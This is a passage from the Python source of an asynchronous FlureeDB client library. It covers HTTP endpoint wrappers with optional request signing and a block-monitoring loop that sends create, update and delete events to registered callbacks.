If https, don't verify ssl certs
ready : string
If defined, provide a ready method to wait for ready condition to become true.
"""
self.session = session
self.url = url
self.ssl_verify_disabled = ssl_verify_disabled
self.ready_field = ready
async def __call__(self):
"""Invoke the functor
Returns
-------
dict
JSON decoded response from the server
Raises
------
FlureeHttpError
If the server returns something different than a 200 OK status
"""
if self.ssl_verify_disabled:
async with self.session.get(self.url, ssl=False) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
response = await resp.text()
return json.loads(response)
else:
async with self.session.get(self.url) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
response = await resp.text()
return json.loads(response)
async def ready(self):
"""Redo get untill ready condition gets met"""
if self.ready_field is None:
print("WARNING: no ready for this endpoint", file=sys.stderr)
return
while True:
try:
obj = await self()
if obj[self.ready_field]:
return
except FlureeHttpError:
pass
except aiohttp.client_exceptions.ClientConnectorError:
pass
await asyncio.sleep(0.5)
class _SignedPoster:
"""Basic signed HTTP posting"""
def __init__(self, client, session, signer, url, required, optional, ssl_verify_disabled, unsigned=False):
"""Constructor
Parameters
----------
client : FlureeClient
FlureeClient used for checking for new databases
session : aiohttp.ClientSession
HTTP session for doing HTTP post/get with
signer : aioflureedb.signing.DbSigner
ECDSA signer for Fluree transactions and queries
url : string
URL of the API endpoint
required : set
Set of required fields for the specific API call.
optional : set
Set of optional fields for the specific API call.
ssl_verify_disabled: bool
If https, ignore ssl certificate issues.
unsigned : bool
If True, don't sign posts.
"""
self.client = client
self.session = session
self.signer = signer
self.url = url
self.required = required
self.optional = optional
self.unsigned = unsigned
if self.signer is None:
self.unsigned = True
self.ssl_verify_disabled = ssl_verify_disabled
async def _post_body_with_headers(self, body, headers):
"""Internal, post body with HTTP headers
Parameters
----------
body : string
HTTP Body string
headers : dict
Key value pairs to use in HTTP POST request
Returns
-------
string
Content as returned by HTTP server, dict if decodable json
Raises
------
FlureeHttpError
When Fluree server returns a status code other than 200
"""
if self.ssl_verify_disabled:
async with self.session.post(self.url, data=body, headers=headers, ssl=False) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
data = await resp.text()
try:
return json.loads(data)
except json.decoder.JSONDecodeError:
return data
else:
async with self.session.post(self.url, data=body, headers=headers) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
data = await resp.text()
try:
return json.loads(data)
except json.decoder.JSONDecodeError:
return data
async def __call__(self, **kwargs):
"""Invoke post API
Parameters
----------
kwargs : dict
Keyword arguments for the POST API call.
Returns
-------
dict
JSON decoded response from FlureeDB server
Raises
------
TypeError
If an unknown kwarg is used on invocation OR a required kwarg is not supplied
"""
# pylint: disable=too-many-locals
kwset = set()
kwdict = {}
for key, value in kwargs.items():
if not (key in self.required or key in self.optional):
raise TypeError("SignedPoster got unexpected keyword argument '" + key + "'")
kwset.add(key)
if key == "db_id":
kwdict["db/id"] = value
else:
kwdict[key] = value
for reqkey in self.required:
if reqkey not in kwset:
raise TypeError("SignedPoster is missing one required named argument '", reqkey, "'")
body = json.dumps(kwdict, indent=4, sort_keys=True)
headers = {"Content-Type": "application/json"}
if not self.unsigned:
body, headers, _ = self.signer.sign_query(kwdict)
rval = await self._post_body_with_headers(body, headers)
# If this is a new-db, we need to await till it comes into existance.
if isinstance(rval, str) and len(rval) == 64 and self.url.split("/")[-1] == "new-db" and "db_id" in kwargs:
dbid = kwargs["db_id"]
while True:
databases = await self.client.dbs()
for database in databases:
dbid2 = database[0] + "/" + database[1]
if dbid == dbid2:
return True
await asyncio.sleep(0.1)
return rval
class _Network:
"""Helper class for square bracket interface to Fluree Client"""
def __init__(self, flureeclient, netname, options):
"""Constructor
Parameters
----------
flureeclient : FlureeClient
FlureeClient object to use as reference.
netname : string
Name of the network for net/db fluree database naming.
options : set
Set with existing databases within network.
"""
self.client = flureeclient
self.netname = netname
self.options = options
def __str__(self):
"""Cast to string
Returns
-------
str
Name of the network
"""
return self.netname
def __getitem__(self, key):
"""Square brackets operator
Parameters
----------
key : string
Name of the desired database
Returns
-------
_DbFunctor
Function for constructing a Fluree Database client.
Raises
------
KeyError
When a non defined database is requested.
"""
database = self.netname + "/" + key
if key not in self.options:
raise KeyError("No such database: '" + database + "'")
return _DbFunctor(self.client, database)
def __iter__(self):
"""Iterate over databases in network
Yields
------
string
Name of the database
_DbFunctor
Function object for getting a FlureeDB database object for this particular DB.
"""
for key in self.options:
database = self.netname + "/" + key
yield _DbFunctor(self.client, database)
class _DbFunctor:
"""Helper functor class for square bracket interface to Fluree Client"""
def __init__(self, client, database):
"""Constructor
Parameters
----------
client : FlureeClient
FlureeClient object to use as reference.
database : string
Full database name
"""
self.client = client
self.database = database
def __str__(self):
"""Cast to string
Returns
-------
str
Database name
"""
return self.database
def __call__(self, privkey=None, auth_address=None, sig_validity=120, sig_fuel=1000):
"""Invoke functor
Parameters
----------
privkey : string
Private key for the specific DB.
auth_address : string
Auth ID belonging with the privkey
sig_validity : int
Validity in seconda of signatures.
sig_fuel : int
Not sure what this is for, consult FlureeDB documentation for info.
Returns
-------
_FlureeDbClient
FlureeClient derived client for a specific DB
"""
return _FlureeDbClient(privkey,
auth_address,
self.database,
self.client.host,
self.client.port,
self.client.https,
self.client.ssl_verify,
sig_validity,
sig_fuel)
class FlureeClient:
"""Basic asynchonous client for FlureeDB for non-database specific APIs"""
def __init__(self,
masterkey=None,
auth_address=None,
host="localhost",
port=8080,
https=False,
ssl_verify=True,
sig_validity=120,
sig_fuel=1000):
"""Constructor
Parameters
----------
masterkey : string
Hex or base58 encoded signing key
auth_address : string
key-id of the signing key
host : string
hostname of the FlureeDB server. Defaults to localhost.
port : int
port of the FlureeDB server. Defaults to 8080
https : bool
Boolean indicating flureeDB is running behind a HTTPS proxy
ssl_verify : bool
Boolean, if False, indicating to not verify ssl certs.
sig_validity : int
Validity in seconda of the signature.
sig_fuel : int
Not sure what this is for, consult FlureeDB documentation for info.
Raises
------
FlureeHalfCredentials
If masterkey is specified but auth_address isn't, or the other way around.
"""
self.host = host
self.port = port
self.https = https
self.ssl_verify = ssl_verify
self.ssl_verify_disabled = False
if https and not ssl_verify:
self.ssl_verify_disabled = True
self.signer = None
if masterkey and auth_address:
self.signer = DbSigner(masterkey, auth_address, None, sig_validity, sig_fuel)
if masterkey and not auth_address or auth_address and not masterkey:
raise FlureeHalfCredentials("masterkey and auth_address should either both be specified, or neither")
self.session = None
self.session = aiohttp.ClientSession()
self.known_endpoints = set(["dbs",
"new_db",
"delete_db",
"add_server",
"remove_server",
"health",
"new_keys"])
self.unsigned_endpoints = set(["dbs", "health", "new_keys"])
self.use_get = set(["health", "new_keys"])
self.required = {}
self.required["new_db"] = set(["db_id"])
self.required["delete_db"] = set(["db_id"])
self.required["add_server"] = set(["server"])
self.required["delete_server"] = set(["server"])
self.optional = {"new_db": set(["snapshot"])}
self.implemented = set(["dbs",
"new_keys",
"health",
"new_db",
"delete_db",
"new_keys",
"add_server",
"remove_server"])
async def __aenter__(self):
"""Method for allowing 'with' constructs
Returns
-------
FlureeClient
this fluree client
"""
return self
async def __aexit__(self, exc_type, exc, traceback):
await self.close_session()
def __dir__(self):
"""Dir function for class
Returns
-------
list
List of defined (pseudo) attributes
"""
return list(self.known_endpoints) + ["close_session",
"__init__",
"__dir__",
"__getattr__",
"__getitem__",
"__aiter__",
" __aenter__",
" __aexit__"]
def __getattr__(self, api_endpoint):
"""Select API endpoint
Parameters
----------
api_endpoint : string
Name of the API endpoint.
Returns
-------
object
Endpoint object suitable for API endpoint.
Raises
------
AttributeError
When a non-defined fluree endpoint is designated
NotImplementedError
When a fluree API endpoint is designated that hasn't been implemented yet.
"""
if api_endpoint not in self.known_endpoints:
raise AttributeError("FlureeDB has no endpoint named " + api_endpoint)
if api_endpoint not in self.implemented:
raise NotImplementedError("No implementation yet for " + api_endpoint)
secure = ""
if self.https:
secure = "s"
url = "http" + \
secure + \
"://" + \
self.host + \
":" + \
str(self.port) + \
"/fdb/" + \
"-".join(api_endpoint.split("_"))
signed = True
if api_endpoint in self.unsigned_endpoints:
signed = False
use_get = False
if api_endpoint in self.use_get:
use_get = True
required = set()
if api_endpoint in self.required:
required = self.required[api_endpoint]
optional = set()
if api_endpoint in self.optional:
optional = self.optional[api_endpoint]
if signed:
return _SignedPoster(self, self.session, self.signer, url, required, optional, self.ssl_verify_disabled)
if use_get:
if api_endpoint == "health":
return _UnsignedGetter(self.session, url, self.ssl_verify_disabled, ready="ready")
return _UnsignedGetter(self.session, url, self.ssl_verify_disabled)
return _SignedPoster(self, self.session, self.signer, url, required, optional, self.ssl_verify_disabled, unsigned=True)
async def __getitem__(self, key):
"""Square bracket operator
Parameters
----------
key : string
Network name, should be defined on server.
Raises
------
KeyError
When a non-defined network is designated.
Returns
-------
_Network
Helper object for designating databases within a network.
"""
subkey = None
if "/" in key:
parts = key.split("/")
key = parts[0]
subkey = parts[1]
databases = await self.dbs()
options = set()
for pair in databases:
if pair[0] == key:
options.add(pair[1])
if not bool(options):
raise KeyError("No such network: '" + key + "'")
network = _Network(self, key, options)
if subkey is None:
return network
return network[subkey]
async def __aiter__(self):
"""Iterate over all networks
Yields
------
string
Name of the network
_Network
Itteratable object with databases per network.
"""
databases = await self.dbs()
optionsmap = {}
for pair in databases:
network = pair[0]
database = pair[1]
if network not in optionsmap:
optionsmap[network] = set()
optionsmap[network].add(database)
for key, item in optionsmap.items():
yield _Network(self, key, item)
async def close_session(self):
"""Close HTTP(S) session to FlureeDB"""
if self.session:
await self.session.close()
return
class _FlureeDbClient:
"""Basic asynchonous client for FlureeDB representing a particular database on FlureeDB"""
def __init__(self,
privkey,
auth_address,
database,
host="localhost",
port=8080,
https=False,
ssl_verify=True,
sig_validity=120,
sig_fuel=1000):
"""Constructor
Parameters
----------
privkey : string
Hex or base58 encoded signing key
auth_address : string
key-id of the signing key
database : string
net/db string of the flureeDB database
host : string
hostname of the FlureeDB server. Defaults to localhost.
port : int
port of the FlureeDB server. Defaults to 8080
https : bool
Boolean indicating flureeDB is running behind a HTTPS proxy
ssl_verify : bool
Boolean, when false, indicating no validation of ssl certs.
sig_validity : int
Validity in seconda of the signature.
sig_fuel : int
Not sure what this is for, consult FlureeDB documentation for info.
"""
self.database = database
self.host = host
self.port = port
self.https = https
self.ssl_verify_disabled = False
self.monitor = {}
self.monitor["listeners"] = {}
self.monitor["running"] = False
self.monitor["next"] = None
self.monitor["rewind"] = 0
self.monitor["on_block_processed"] = None
self.monitor["predicate_map"] = {}
self.monitor["predicate_map_multi"] = {}
self.monitor["predicate_map_block"] = 0
self.monitor["lastblock_instant"] = None
self.monitor["instant_monitors"] = []
if https and not ssl_verify:
self.ssl_verify_disabled = True
self.signer = None
if privkey and auth_address:
self.signer = DbSigner(privkey, auth_address, database, sig_validity, sig_fuel)
self.session = None
self.session = aiohttp.ClientSession()
self.known_endpoints = set(["snapshot",
"list_snapshots",
"export",
"query",
"flureeql",
"multi_query",
"block",
"history",
"transact",
"graphql",
"sparql",
"command",
"reindex",
"hide",
"gen_flakes",
"query_with",
"test_transact_with",
"block_range_with",
"ledger_stats",
"storage",
"pw"])
self.pw_endpoints = set(["generate", "renew", "login"])
self.implemented = set(["query",
"flureeql",
"block",
"command",
"ledger_stats",
"list_snapshots",
"snapshot",
"multi_query"])
def monitor_init(self, on_block_processed, start_block=None, rewind=0, always_query_object=False, start_instant=None):
"""Set the basic variables for a fluree block event monitor run
Parameters
----------
on_block_processed: callable
Callback to invoke when a block has been fully processed.
start_block: int
Block number to start at, instead of the next block to arive on the blockchain
rewind: int
Number of seconds to rewind from now. Currently not implemented.
always_query_object: bool
Boolean choosing if we want to run efficiently and only query if block parsing gives ambiguous results,
or if we always want to use extra queries
start_instant: int
If (and only if) instant monitor callbacks are used, this parameter should be provided to avoid
large replays of inactive chain instant events that occured after the last block. Use the instant
as provided py the persistence callback in the previous run.
Raises
------
NotImplementedError
Currently raised when rewind is specified.
"""
assert callable(on_block_processed)
assert start_block is None or isinstance(start_block, int)
assert isinstance(rewind, int)
self.monitor["next"] = start_block
self.monitor["rewind"] = rewind
self.monitor["always_query_object"] = always_query_object
self.monitor["on_block_processed"] = on_block_processed
self.monitor["lastblock_instant"] = start_instant
def monitor_register_create(self, collection, callback):
"""Add a callback for create events on a collection
Parameters
----------
collection: str
Name of the collection to monitor
callback: callable
Callback to invoke when create event on collection is identified.
"""
assert isinstance(collection, str)
assert callable(callback)
if collection not in self.monitor["listeners"]:
self.monitor["listeners"][collection] = {}
if "C" not in self.monitor["listeners"][collection]:
self.monitor["listeners"][collection]["C"] = set()
self.monitor["listeners"][collection]["C"].add(callback)
def monitor_register_delete(self, collection, callback):
"""Add a callback for delete events on a collection
Parameters
----------
collection: str
Name of the collection to monitor
callback: callable
Callback to invoke when delete event on collection is identified.
"""
assert isinstance(collection, str)
assert callable(callback)
if collection not in self.monitor["listeners"]:
self.monitor["listeners"][collection] = {}
if "D" not in self.monitor["listeners"][collection]:
self.monitor["listeners"][collection]["D"] = set()
self.monitor["listeners"][collection]["D"].add(callback)
def monitor_register_update(self, collection, callback):
"""Add a callback for update events on a collection
Parameters
----------
collection: str
Name of the collection to monitor
callback: callable
Callback to invoke when update event on collection is identified.
"""
assert isinstance(collection, str)
assert callable(callback)
if collection not in self.monitor["listeners"]:
self.monitor["listeners"][collection] = {}
if "U" not in self.monitor["listeners"][collection]:
self.monitor["listeners"][collection]["U"] = set()
self.monitor["listeners"][collection]["U"].add(callback)
def monitor_instant(self, predicate, callback, offset=0):
"""Ass a callback for the passing of time on an instant predicate
Parameters
----------
predicate: str
Name of the instant predicate to monitor
callback: callable
Callback to invoke when the time (plus offset) passes the monitored instant
offset: int
If specified, number of seconds from monitored instant value to trigger on
"""
self.monitor["instant_monitors"].append([predicate, offset*1000, callback])
def monitor_close(self):
"""Abort running any running monitor"""
self.monitor["running"] = False
async def _figure_out_next_block(self):
"""Figure out what block the user wants/needs to be the next block"""
if self.monitor["rewind"] != 0 and self.monitor["rewind"] is not None:
filt = "(> ?instant (- (now) (* 1000 " + str(self.monitor["rewind"]) + "))))"
rewind_block = await self.flureeql.query(
select=["?blockid"],
opts={"orderBy": ["ASC", "?instant"], "limit": 1},
where=[
["?block", "_block/instant", "?instant"],
["?block", "_block/number", "?blockid"],
{"filter": [filt]}
])
if rewind_block and (self.monitor["next"] is None or self.monitor["next"] < rewind_block[0][0]):
self.monitor["next"] = rewind_block[0][0]
if not rewind_block:
self.monitor["next"] = None
async def _build_predicates_map(self, block=None):
"""Build a predicates map for quick lookup
Returns
-------
dict
dictionary mapping predicate id's to predicate names
"""
if block is not None:
if self.monitor["predicate_map_block"] != block:
predicates = await self.flureeql.query(select=["name", "multi"], ffrom="_predicate", block=block)
self.monitor["predicate_map_block"] = block
else:
predicates = None
else:
predicates = await self.flureeql.query(select=["name", "multi"], ffrom="_predicate")
if predicates is not None:
predicate = {}
is_multi = {}
for pred in predicates:
predicate[pred["_id"]] = pred["name"]
if "multi" in pred:
is_multi[pred["name"]] = pred["multi"]
else:
is_multi[pred["name"]] = False
self.monitor["predicate_map"] = predicate
self.monitor["predicate_map_multi"] = is_multi
async def _find_start_block(self):
"""Find the start block
Returns
-------
int
Number of the starting block
Raises
------
RuntimeError
Raised when the very first ledger_stats issued to FlureeDB returns an error.
"""
if self.monitor["next"] is None:
stats = await self.ledger_stats()
if "status" in stats and stats["status"] == 200 and "data" in stats and "block" in stats["data"]:
startblock = stats["data"]["block"]
else:
raise RuntimeError("Invalid initial response from ledger_stats")
else:
startblock = self.monitor["next"]
return startblock
async def _get_endblock(self, errorcount=0):
"""Get what for now should be the ending block
Parameters
----------
errorcount: int
Counter for counting succesive API failure
Returns
-------
int
The ending block number
int
An updated version of the errorcount argument
"""
stats = await self.ledger_stats()
if "status" in stats and stats["status"] == 200 and "data" in stats and "block" in stats["data"]:
endblock = stats["data"]["block"]
return endblock, 0
return 0, errorcount + 1
def _get_flakeset_collection(self, flakelist):
"""Helper function for getting the collection name from a flakes array
Parameters
----------
flakelist : list
list of flake lists
Returns
-------
str
Name of the collection.
"""
return flakelist[0][1].split("/")[0]
async def _group_block_flakes(self, block_data, blockno):
"""Return a grouped-by object-id and predicate name patched version of a block
Parameters
----------
block_data : list
Raw block data as returned by FlureeDB
predicate : dict
Dictionary for looking up predicate names by number
blockno : int
Number of the block currently being processed.
Returns
-------
dict
A dictionary of object id's to flake arrays.
Raises
------
FlureeUnexpectedPredicateNumber
Raised when an unknown predicate id is detected.
"""
has_predicate_updates = False
grouped = {}
for flake in block_data[0]["flakes"]:
predno = flake[1]
# Patch numeric predicates to textual ones.
if predno in self.monitor["predicate_map"]:
flake[1] = self.monitor["predicate_map"][predno]
else:
raise FlureeUnexpectedPredicateNumber("Need a restart after new predicates are added to the database")
# Group the flakes together by object.
if not flake[0] in grouped:
grouped[flake[0]] = []
grouped[flake[0]].append(flake)
# pylint: disable=consider-using-dict-items
for obj in grouped:
if grouped[obj][0][1].split("/")[0] == "_predicate":
has_predicate_updates = True
# pylint: enable=consider-using-dict-items
if has_predicate_updates:
await self._build_predicates_map(blockno)
return grouped
def _get_transactions_and_temp_ids(self, flakeset):
"""Extract transactions and temp id's from a single 'tx' flakeset
Parameters
----------
flakeset : list
List of flakes belonging to a 'tx' in the current block.
Returns
-------
list
list of operations from this transaction
dict
map of temporary ids.
"""
operations = None
tempids = None
for flake in flakeset:
if flake[1] == '_tx/tempids':
try:
tid_obj = json.loads(flake[2])
if isinstance(tid_obj, dict):
tempids = tid_obj
except json.decoder.JSONDecodeError:
pass
elif flake[1] == "_tx/tx":
try:
tx_obj = json.loads(flake[2])
if isinstance(tx_obj, dict) and "tx" in tx_obj and isinstance(tx_obj["tx"], list):
operations = tx_obj["tx"]
except json.decoder.JSONDecodeError:
pass
return operations, tempids
def _get_block_instant(self, flakeset):
"""Extract transactions and temp id's from a single 'tx' flakeset
Parameters
----------
flakeset : list
List of flakes belonging to a 'tx' in the current block.
Returns
-------
int
Time instance value for this block
"""
instance = None
for flake in flakeset:
if flake[1] == '_block/instant':
instance = flake[2]
return instance
async def _get_block_instant_by_blockno(self, block):
"""Get the instant timestamp for a given block number
Parameters
----------
block: int
Block number
Returns
-------
int
Time instance value for this block
"""
result = await self.flureeql.query(
select=["?instant"],
where=[
["?block", "_block/instant", "?instant"],
["?block", "_block/number", block]
]
)
if result:
return result[0][0]
return None
def _get_object_id_to_operation_map(self, tempids, operations):
"""Process temp ids and operations, return an object id to operation map.
Parameters
----------
tempids : dict
Temp-id map
operations : list
The url that would have been used
Returns
-------
dict
object id to operation map.
"""
# pylint: disable=too-many-nested-blocks, too-many-branches
obj_tx = {}
if tempids:
for tmp_id in tempids:
real_id = tempids[tmp_id]
counters = {}
if isinstance(real_id, int):
for operation in operations:
if isinstance(operation, dict) and "_id" in operation:
if isinstance(operation["_id"], str):
if operation["_id"] == tmp_id:
obj_tx[real_id] = operation
if operation["_id"] not in counters:
counters[operation["_id"]] = 0
counters[operation["_id"]] += 1
altname = operation["_id"] + "$" + str(counters[operation["_id"]])
if altname == tmp_id:
obj_tx[real_id] = operation
elif isinstance(operation["_id"], list):
if len(operation["_id"]) == 2:
txid = '["' + operation["_id"][0] + '" "' + operation["_id"][1] + '"]'
if txid == tmp_id:
obj_tx[real_id] = operation
if len(operations) == 1:
obj_tx[""] = operations[0]
for operation in operations:
if isinstance(operation, dict) and "_id" in operation:
if isinstance(operation["_id"], int):
obj_tx[operation["_id"]] = operation
return obj_tx
async def _do_instant_monitor(self, oldinstant, newinstant, blockno):
for monitor in self.monitor["instant_monitors"]:
predicate = monitor[0]
offset = monitor[1]
callback = monitor[2]
windowstart = oldinstant - offset
windowstop = newinstant - offset
filt = "(and (> ?instant " + str(windowstart) + ") (<= ?instant " + str(windowstop) + "))"
eventlist = await self.flureeql.query(
select=[{"?whatever": ["*"]}],
opts={"orderBy": ["ASC", "?instant"]},
where=[
["?whatever", predicate, "?instant"],
{"filter": [filt]}
],
block=blockno
)
for event in eventlist:
await callback(event)
async def _process_instant(self, instant, block, fromblock):
minute = 60000
timeout = 1*minute
if (fromblock or
self.monitor["lastblock_instant"] and
self.monitor["lastblock_instant"] + timeout < instant):
if self.monitor["lastblock_instant"]:
await self._do_instant_monitor(self.monitor["lastblock_instant"], instant, block)
self.monitor["lastblock_instant"] = instant
async def _get_and_preprocess_block(self, blockno):
"""Fetch a block by block number and preprocess it
Parameters
----------
blockno : int
Number of the block that needs to be fetched
predicate : dict
Predicate id to name map
Returns
-------
list
A grouped and predicate patched version of the fetched block.
dict
Object id to operation dict
"""
# Fetch the new block
block_data = await self.block.query(block=blockno)
# Groub by object
try:
grouped = await self._group_block_flakes(block_data, blockno)
except FlureeUnexpectedPredicateNumber:
await self._build_predicates_map(blockno)
grouped = await self._group_block_flakes(block_data, blockno)
# Distill new ones using _tx/tempids
obj_tx = {}
block_meta = {}
for obj in grouped:
transactions = None
tempids = None
instant = None
collection = self._get_flakeset_collection(grouped[obj])
if collection == "_tx":
transactions, tempids = self._get_transactions_and_temp_ids(grouped[obj])
if collection == "_block":
instant = self._get_block_instant(grouped[obj])
for flake in grouped[obj]:
if len(flake[1].split("/")) > 1:
block_meta[flake[1].split("/")[1]] = flake[2]
if transactions:
obj_tx = self._get_object_id_to_operation_map(tempids, transactions)
if instant:
await self._process_instant(instant, blockno, True)
return grouped, obj_tx, instant, block_meta
async def _process_flakeset(self, collection, obj, obj_tx, blockno, block_meta):
"""Process temp ids and operations, return an object id to operation map.
Parameters
----------
collection : str
name of the collection the object for this flakeset refers to
obj : list
The flakelist
obj_tx : dict
Dictionary mapping from object id to operation object.
blockno : int
Block number of the block currently being processed.
"""
# pylint: disable=too-many-branches,too-many-statements
operation = None
action = None
previous = None
latest = None
if obj[0][0] in obj_tx:
operation = obj_tx[obj[0][0]]
elif "" in obj_tx:
operation = obj_tx[""]
has_true = False
has_false = False
has_multi = False
for flake in obj:
if flake[4]:
has_true = True
else:
has_false = True
if flake[1] in self.monitor["predicate_map_multi"]:
if self.monitor["predicate_map_multi"][flake[1]]:
has_multi = True
if self.monitor["always_query_object"]:
previous = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno-1)
if previous:
previous = previous[0]
action = "update"
else:
previous = None
latest = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno)
if latest:
latest = latest[0]
else:
latest = None
if previous is None:
action = "insert"
elif latest is None:
action = "delete"
else:
action = "update"
if operation and "_action" in operation and operation["_action"] != "upsert" and not has_multi:
action = operation["_action"]
if action is None and has_true and has_false:
action = "update"
if action is None and operation and "_id" in operation and isinstance(operation["_id"], str):
action = "insert"
if action is None and operation and has_false and not has_true:
if len(obj) == 1 and has_multi:
action = "update"
else:
action = "delete"
if action is None and has_true and not has_false:
if blockno > 1:
previous = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno-1)
if previous:
previous = previous[0]
action = "update"
else:
previous = None
action = "insert"
else:
previous = None
action = "insert"
if action is None:
latest = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno)
if latest:
latest = latest[0]
action = "update"
else:
latest = None
action = "delete"
if action == "insert" and "C" in self.monitor["listeners"][collection]:
for callback in self.monitor["listeners"][collection]["C"]:
await callback(obj_id=obj[0][0], flakes=obj, new_obj=latest, operation=operation, block_meta=block_meta)
elif action == "update" and "U" in self.monitor["listeners"][collection]:
for callback in self.monitor["listeners"][collection]["U"]:
await callback(obj_id=obj[0][0],
flakes=obj,
old_obj=previous,
new_obj=latest,
operation=operation,
block_meta=block_meta)
elif action == "delete" and "D" in self.monitor["listeners"][collection]:
for callback in self.monitor["listeners"][collection]["D"]:
await callback(obj_id=obj[0][0], flakes=obj, old_obj=previous, operation=operation, block_meta=block_meta)
async def monitor_untill_stopped(self):
"""Run the block event monitor untill stopped
Raises
------
NotImplementedError
Currently raised when rewing is specified.
RuntimeError
Raised either when there are no listeners set, or if there are too many errors.
"""
# pylint: disable=too-many-nested-blocks, too-many-branches, too-many-return-statements
if (not bool(self.monitor["listeners"])) and (not bool(self.monitor["instant_monitors"])):
raise RuntimeError("Can't start monitor with zero registered listeners")
# Set running to true. We shall abort when it is set to false.
self.monitor["running"] = True
await self._figure_out_next_block()
if not self.monitor["running"]:
return
startblock = await self._find_start_block() + 1
if not self.monitor["running"]:
return
# First make a dict from the _predicate collection.
if startblock > 1:
await self._build_predicates_map(startblock - 1)
if not self.monitor["running"]:
return
noblocks = True
if startblock > 1 and self.monitor["instant_monitors"] and self.monitor["lastblock_instant"] is None:
self.monitor["lastblock_instant"] = await self._get_block_instant_by_blockno(startblock-1)
if not self.monitor["running"]:
return
stats_error_count = 0
last_instant = 0
while self.monitor["running"]:
# If we had zero blocks to process the last time around, wait a full second before
# polling again if there are new blocks.
if noblocks:
await asyncio.sleep(1)
if not self.monitor["running"]:
return
await self._process_instant(int(time.time()*1000), startblock - 1, False)
now = int(time.time()*1000)
if now - last_instant >= 59500: # Roughly one minute
last_instant = now
await self.monitor["on_block_processed"](startblock - 1, now)
if not self.monitor["running"]:
return
noblocks = True
endblock, stats_error_count = await self._get_endblock()
if not self.monitor["running"]:
return
if endblock:
if endblock >= startblock:
noblocks = False
for block in range(startblock, endblock + 1):
grouped, obj_tx, instant, block_meta = await self._get_and_preprocess_block(block)
# Process per object.
for obj in grouped:
if obj > 0:
collection = self._get_flakeset_collection(grouped[obj])
if collection in self.monitor["listeners"]:
await self._process_flakeset(collection, grouped[obj], obj_tx, block, block_meta)
if not self.monitor["running"]:
return
# Call the persistence layer.
await self.monitor["on_block_processed"](block, instant)
last_instant = instant
# Set the new start block.
startblock = endblock + 1
else:
stats_error_count += 1
if stats_error_count > 100:
raise RuntimeError("Too many errors from ledger_stats call")
async def ready(self):
"""Awaitable that polls the database untill the schema contains collections"""
while True:
try:
await self.flureeql.query(
select=["_collection/name"],
ffrom="_collection"
)
return
except FlureeHttpError:
await asyncio.sleep(0.1)
async def __aexit__(self, exc_type, exc, traceback):
await self.close_session()
async def __aenter__(self):
"""Method for allowing 'with' constructs
Returns
-------
_FlureeDbClient
this fluree DB client
"""
return self
async def close_session(self):
"""Close HTTP(S) session to FlureeDB"""
if self.session:
await self.session.close()
return
def __dir__(self):
"""Dir function for class
Returns
-------
list
List of defined (pseudo) attributes
"""
return list(self.known_endpoints) + ["close_session",
"__init__",
"__dir__",
"__getattr__",
" __aenter__",
" __aexit__"]
def __getattr__(self, api_endpoint):
# pylint: disable=too-many-statements
"""Select API endpoint
Parameters
----------
api_endpoint : string
Name of the API endpoint.
Returns
-------
object
Endpoint object suitable for API endpoint.
Raises
------
NotImplementedError
Defined endpoint without library implementation (for now)
AttributeError
Undefined API endpoint invoked
FlureeKeyRequired
When 'command' endpoint is invoked in open-API mode.
"""
class _StringEndpoint:
def __init__(self, api_endpoint, client, ssl_verify_disabled=False):
"""Constructor
Parameters
----------
api_endpoint : string
Name of the API endpoint
client: object
The wrapping _FlureeDbClient
ssl_verify_disabled: bool
If https, dont validate ssl certs.
"""
self.api_endpoint = api_endpoint
secure = ""
if client.https:
secure = "s"
self.url = "http" + \
secure + \
"://" + \
client.host + \
":" + \
str(client.port) + \
"/fdb/" + \
client.database + \
"/" + \
"-".join(api_endpoint.split("_"))
self.signer = client.signer
self.session = client.session
self.ssl_verify_disabled = ssl_verify_disabled
async def _post_body_with_headers(self, body, headers):
"""Internal, post body with HTTP headers
Parameters
----------
body : string
HTTP Body string
headers : dict
Key value pairs to use in HTTP POST request
Returns
-------
string
Content as returned by HTTP server
Raises
------
FlureeHttpError
When HTTP status from fluree server is anything other than 200
"""
if self.ssl_verify_disabled:
async with self.session.post(self.url, data=body, headers=headers, ssl=False) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
return await resp.text()
else:
async with self.session.post(self.url, data=body, headers=headers) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
return await resp.text()
async def header_signed(self, query_body):
"""Do a HTTP query using headers for signing
Parameters
----------
query_body : any
query body to sign using headers.
Returns
-------
string
Return body from server
"""
if self.signer:
body, headers, _ = self.signer.sign_query(query_body, querytype=self.api_endpoint)
else:
body = json.dumps(query_body, indent=4, sort_keys=True)
headers = {"Content-Type": "application/json"}
return await self._post_body_with_headers(body, headers)
async def body_signed(self, transact_obj, deps=None):
"""Do a HTTP query using body envelope for signing
Parameters
----------
transact_obj : list
transaction to sign using body envelope.
deps: dict
FlureeDb debs
Returns
-------
string
Return body from server
"""
command = self.signer.sign_transaction(transact_obj, deps)
body = json.dumps(command, indent=4, sort_keys=True)
headers = {"content-type": "application/json"}
return await self._post_body_with_headers(body, headers)
async def empty_post_unsigned(self):
"""Do an HTTP POST without body and without signing
Returns
-------
string
Return body from server
"""
return await self._post_body_with_headers(None, None)
class FlureeQlEndpointMulti:
"""Endpoint for JSON based (FlureeQl) multi-queries"""
def __init__(self, client, ssl_verify_disabled, raw=None):
"""Constructor
Parameters
----------
client: object
The wrapping _FlureeDbClient
ssl_verify_disabled: bool
When using https, don't validata ssl certs.
raw: dict
The whole raw multiquery
"""
self.stringendpoint = _StringEndpoint("multi_query", client, ssl_verify_disabled)
if raw:
self.multi_query = raw
else:
self.multi_query = {}
def __call__(self, raw=None):
"""Invoke as function object.
Parameters
----------
raw: dict
The whole raw multiquery
Returns
-------
FlureeQlEndpointMulti
Pointer to self
"""
if raw is not None:
self.multi_query = raw
return self
def __dir__(self):
"""Dir function for class
Returns
-------
list
List of defined (pseudo) attributes
"""
return ["__call__", "__dir__", "__init__"]
def __getattr__(self, method):
"""query
Parameters
----------
method : string
subquery name
Returns
-------
_FlureeQlSubQuery
Helper class for creating FlureeQl multi-queries.
"""
